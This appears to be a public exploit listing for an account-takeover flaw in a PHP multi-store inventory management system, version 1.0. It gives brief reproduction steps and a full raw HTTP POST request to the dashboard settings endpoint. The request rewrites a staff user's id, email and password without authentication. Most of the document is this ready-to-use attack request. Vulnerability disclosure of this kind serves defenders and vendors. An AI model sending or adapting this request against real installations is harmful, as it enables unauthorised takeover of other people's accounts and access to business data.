Share
## https://sploitus.com/exploit?id=1337DAY-ID-37575
# Exploit Title: Multi Store Inventory Management System - Account Takeover (Unauthenticated)
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.bdtask.com/
# Software Link: https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/
# Version: 1.0
# Tested on: XAMPP, Windows 10
# Contact: https://twitter.com/dmaral3noz

# Description :

An attacker can takeover any registered 'Staff' user account by just sending below POST request
By changing the the "id", "email", "password" , "firstname" and "lastname" parameters


#Steps to Reproduce :

1. Send the below POST request by changing "id", "email", "password" parameters.

2. Log in to the user account by changed email and password.


################################################


POST /multistore_demo/dashboard/home/setting HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------246162487211952414471071914687
Content-Length: 1645
Origin: http://localhost
Connection: close
Referer: http://localhost/multistore_demo/dashboard/home/setting
Cookie: ci_session=31504fa8fdcd43505beff1b210056ec12d5d8405
Upgrade-Insecure-Requests: 1

-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="id"

1
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="firstname"

saud
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="lastname"

test
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="password"

admin123
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="about"


-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="old_image"


-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


-----------------------------246162487211952414471071914687--